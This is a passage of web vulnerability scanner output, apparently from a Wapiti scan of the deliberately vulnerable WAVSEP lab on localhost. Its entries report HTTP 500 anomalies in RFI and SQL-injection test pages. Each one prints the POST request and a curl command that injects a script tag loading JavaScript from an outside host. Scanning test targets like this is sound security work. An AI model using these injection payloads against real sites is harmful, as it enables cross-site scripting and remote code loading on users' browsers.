curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3ymbjy8iwz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwss0r7gq2ez.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwss0r7gq2ez.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrljuc8tecz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrljuc8tecz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwd7dl7v4wvz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwd7dl7v4wvz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3ttfoi1hnz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3ttfoi1hnz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw447u6gxymz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw447u6gxymz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwt7z4qditqz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwt7z4qditqz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4yqmpsod3z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4yqmpsod3z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgdjta3zy9z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -d "transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgdjta3zy9z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi3007lphnz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi3007lphnz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwruk0tstwez.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwruk0tstwez.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwepa4erwndz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwepa4erwndz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw5uuopv62bz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw5uuopv62bz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrrfa83ztcz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrrfa83ztcz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9nj9f61w0z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9nj9f61w0z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbml0zxp0mz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbml0zxp0mz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwr5gjtzfogz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwr5gjtzfogz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8xfzbeq2bz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8xfzbeq2bz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgy6xooh5xz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgy6xooh5xz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbv8dxjmpuz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -d "transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbv8dxjmpuz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw681z6hlgmz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw681z6hlgmz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2esdj39i8z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2esdj39i8z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwuyvjckekfz.js%3E%3C%2Fscript%3E
